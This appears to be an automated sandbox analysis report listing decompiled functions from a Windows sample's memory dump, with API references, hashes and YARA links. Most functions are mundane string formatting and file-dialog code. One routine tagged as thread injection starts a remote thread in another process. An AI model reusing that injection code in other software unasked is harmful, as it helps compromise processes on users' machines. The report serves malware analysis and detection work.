                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Window$Rect$ClientPoints
                                                                                                        • String ID:
                                                                                                        • API String ID: 4235085887-0
                                                                                                        • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                        • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                        • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                        • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 72%
                                                                                                        			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}







                                                                                                        0x0040b6a6
                                                                                                        0x0040b6ad
                                                                                                        0x0040b6af
                                                                                                        0x0040b6b0
                                                                                                        0x0040b6b5
                                                                                                        0x0040b6b6
                                                                                                        0x0040b6bd
                                                                                                        0x0040b6bf
                                                                                                        0x0040b6c0
                                                                                                        0x0040b6c5
                                                                                                        0x0040b6c6
                                                                                                        0x0040b6cd
                                                                                                        0x0040b6cf
                                                                                                        0x0040b6d0
                                                                                                        0x0040b6d5
                                                                                                        0x0040b6d6
                                                                                                        0x0040b6dd
                                                                                                        0x0040b6df
                                                                                                        0x0040b6e0
                                                                                                        0x00000000
                                                                                                        0x0040b6e5
                                                                                                        0x0040b6e6

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??3@
                                                                                                        • String ID:
                                                                                                        • API String ID: 613200358-0
                                                                                                        • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                        • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                        • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                        • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 75%
                                                                                                        			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}























                                                                                                        0x00407362
                                                                                                        0x00407369
                                                                                                        0x0040736e
                                                                                                        0x00407371
                                                                                                        0x00407378
                                                                                                        0x0040737e
                                                                                                        0x00407381
                                                                                                        0x00407386
                                                                                                        0x0040739f
                                                                                                        0x00407388
                                                                                                        0x00407391
                                                                                                        0x00407391
                                                                                                        0x004073a4
                                                                                                        0x004073ac
                                                                                                        0x004073ad
                                                                                                        0x004073cd
                                                                                                        0x004073d0
                                                                                                        0x004073d3
                                                                                                        0x004073d6
                                                                                                        0x004073e0
                                                                                                        0x004073e7
                                                                                                        0x004073ee
                                                                                                        0x004073f5
                                                                                                        0x0040741a
                                                                                                        0x0040741a
                                                                                                        0x0040741d
                                                                                                        0x00407420
                                                                                                        0x00407423
                                                                                                        0x00407426
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004073fc
                                                                                                        0x00407400
                                                                                                        0x0040740f
                                                                                                        0x00407412
                                                                                                        0x00407412
                                                                                                        0x00407402
                                                                                                        0x00407402
                                                                                                        0x00407407
                                                                                                        0x00407407
                                                                                                        0x00407413
                                                                                                        0x00407419
                                                                                                        0x00407419
                                                                                                        0x00407419
                                                                                                        0x0040742f
                                                                                                        0x00407434
                                                                                                        0x00407437
                                                                                                        0x00407439
                                                                                                        0x0040743b
                                                                                                        0x0040743b
                                                                                                        0x0040744e
                                                                                                        0x00407453
                                                                                                        0x00407453
                                                                                                        0x004073af
                                                                                                        0x004073b2
                                                                                                        0x004073ba
                                                                                                        0x004073bb
                                                                                                        0x00000000
                                                                                                        0x004073bd
                                                                                                        0x004073c3
                                                                                                        0x004073c3
                                                                                                        0x004073bb
                                                                                                        0x0040745c
                                                                                                        0x00407468
                                                                                                        0x00407468
                                                                                                        0x0040746d
                                                                                                        0x00407473
                                                                                                        0x0040747c
                                                                                                        0x0040748e

                                                                                                        APIs
                                                                                                        • wcschr.MSVCRT ref: 004073A4
                                                                                                        • wcschr.MSVCRT ref: 004073B2
                                                                                                          • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                          • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wcschr$memcpywcslen
                                                                                                        • String ID: "
                                                                                                        • API String ID: 1983396471-123907689
                                                                                                        • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                        • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                        • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                        • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70threadinjectionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 64%
                                                                                                        			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}




















                                                                                                        0x0040a27d
                                                                                                        0x0040a286
                                                                                                        0x0040a290
                                                                                                        0x0040a29d
                                                                                                        0x00000000
                                                                                                        0x0040a32f
                                                                                                        0x0040a29f
                                                                                                        0x0040a2a4
                                                                                                        0x0040a2ad
                                                                                                        0x0040a2b6
                                                                                                        0x0040a2bc
                                                                                                        0x0040a2be
                                                                                                        0x0040a2c4
                                                                                                        0x0040a2c8
                                                                                                        0x0040a2ce
                                                                                                        0x0040a2e3
                                                                                                        0x0040a2ed
                                                                                                        0x0040a2fb
                                                                                                        0x0040a2fe
                                                                                                        0x0040a305
                                                                                                        0x0040a30c
                                                                                                        0x0040a30f
                                                                                                        0x0040a313
                                                                                                        0x00000000
                                                                                                        0x0040a31a
                                                                                                        0x0040a338

                                                                                                        APIs
                                                                                                        • GetVersionExW.KERNEL32(?,751468A0,00000000), ref: 0040A290
                                                                                                        • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                          • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                          • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                        • String ID: $
                                                                                                        • API String ID: 283512611-3993045852
                                                                                                        • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                        • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                        • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                        • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}













                                                                                                        0x00401676
                                                                                                        0x0040167e
                                                                                                        0x0040168a
                                                                                                        0x0040168c
                                                                                                        0x00401690
                                                                                                        0x00401691
                                                                                                        0x00401696
                                                                                                        0x0040169d
                                                                                                        0x004016a2
                                                                                                        0x004016aa
                                                                                                        0x004016aa
                                                                                                        0x004016aa
                                                                                                        0x004016ad
                                                                                                        0x004016ae
                                                                                                        0x004016b3
                                                                                                        0x004016b9
                                                                                                        0x004016bb
                                                                                                        0x004016bc
                                                                                                        0x004016c1
                                                                                                        0x004016c8
                                                                                                        0x004016cd
                                                                                                        0x004016ce
                                                                                                        0x004016ea
                                                                                                        0x004016ff
                                                                                                        0x0040170c
                                                                                                        0x004016d0
                                                                                                        0x004016e3
                                                                                                        0x004016e3
                                                                                                        0x00401711
                                                                                                        0x00401714
                                                                                                        0x00000000
                                                                                                        0x00401719
                                                                                                        0x0040171c

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintf
                                                                                                        • String ID: Line%d$Lines
                                                                                                        • API String ID: 3988819677-2790224864
                                                                                                        • Opcode ID: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                                        • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                        • Opcode Fuzzy Hash: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                                        • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 70%
                                                                                                        			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                                                        0x00405132
                                                                                                        0x00405135
                                                                                                        0x00405139
                                                                                                        0x0040513e
                                                                                                        0x00405141
                                                                                                        0x004051b3
                                                                                                        0x00405143
                                                                                                        0x00405145
                                                                                                        0x00405147
                                                                                                        0x0040514c
                                                                                                        0x0040514e
                                                                                                        0x00405151
                                                                                                        0x00405151
                                                                                                        0x0040515b
                                                                                                        0x0040515c
                                                                                                        0x0040515d
                                                                                                        0x0040515e
                                                                                                        0x0040515f
                                                                                                        0x00405168
                                                                                                        0x00405169
                                                                                                        0x00405171
                                                                                                        0x00405173
                                                                                                        0x00405174
                                                                                                        0x00405182
                                                                                                        0x00405184
                                                                                                        0x00405189
                                                                                                        0x0040518c
                                                                                                        0x00405194
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405196
                                                                                                        0x0040519a
                                                                                                        0x0040519b
                                                                                                        0x004051a1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004051a1
                                                                                                        0x004051a3
                                                                                                        0x004051a3
                                                                                                        0x004051a6
                                                                                                        0x004051af
                                                                                                        0x004051b0
                                                                                                        0x004051b7

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintfmemcpy
                                                                                                        • String ID: %2.2X
                                                                                                        • API String ID: 2789212964-323797159
                                                                                                        • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                        • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                        • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                        • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 43%
                                                                                                        			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}









                                                                                                        0x004075bb
                                                                                                        0x004075c2
                                                                                                        0x004075c7
                                                                                                        0x004075ca
                                                                                                        0x004075cd
                                                                                                        0x004075d8
                                                                                                        0x004075e9
                                                                                                        0x004075fc
                                                                                                        0x00407600
                                                                                                        0x00407601
                                                                                                        0x00407606
                                                                                                        0x00407609
                                                                                                        0x0040760e
                                                                                                        0x00407619
                                                                                                        0x0040761e
                                                                                                        0x0040761f
                                                                                                        0x00407624
                                                                                                        0x00407636

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintf
                                                                                                        • String ID: %%-%d.%ds
                                                                                                        • API String ID: 3988819677-2008345750
                                                                                                        • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                        • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                        • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                        • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}















                                                                                                        0x00405080
                                                                                                        0x00405086
                                                                                                        0x0040508b
                                                                                                        0x0040508e
                                                                                                        0x00405091
                                                                                                        0x00405097
                                                                                                        0x0040509d
                                                                                                        0x004050a4
                                                                                                        0x004050ab
                                                                                                        0x004050b2
                                                                                                        0x004050b5
                                                                                                        0x004050bc
                                                                                                        0x004050cb
                                                                                                        0x004050e0
                                                                                                        0x004050cd
                                                                                                        0x004050d1
                                                                                                        0x004050dc
                                                                                                        0x004050dc

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileNameOpenwcscpy
                                                                                                        • String ID: L
                                                                                                        • API String ID: 3246554996-2909332022
                                                                                                        • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                        • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                        • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                        • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 58%
                                                                                                        			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}







                                                                                                        0x00409072
                                                                                                        0x00409074
                                                                                                        0x0040907d
                                                                                                        0x00409086
                                                                                                        0x0040908e
                                                                                                        0x004090a5
                                                                                                        0x004090a5
                                                                                                        0x0040908e
                                                                                                        0x004090ac

                                                                                                        APIs
                                                                                                        • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc
                                                                                                        • String ID: LookupAccountSidW$Y@
                                                                                                        • API String ID: 190572456-2352570548
                                                                                                        • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                        • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                        • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                        • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

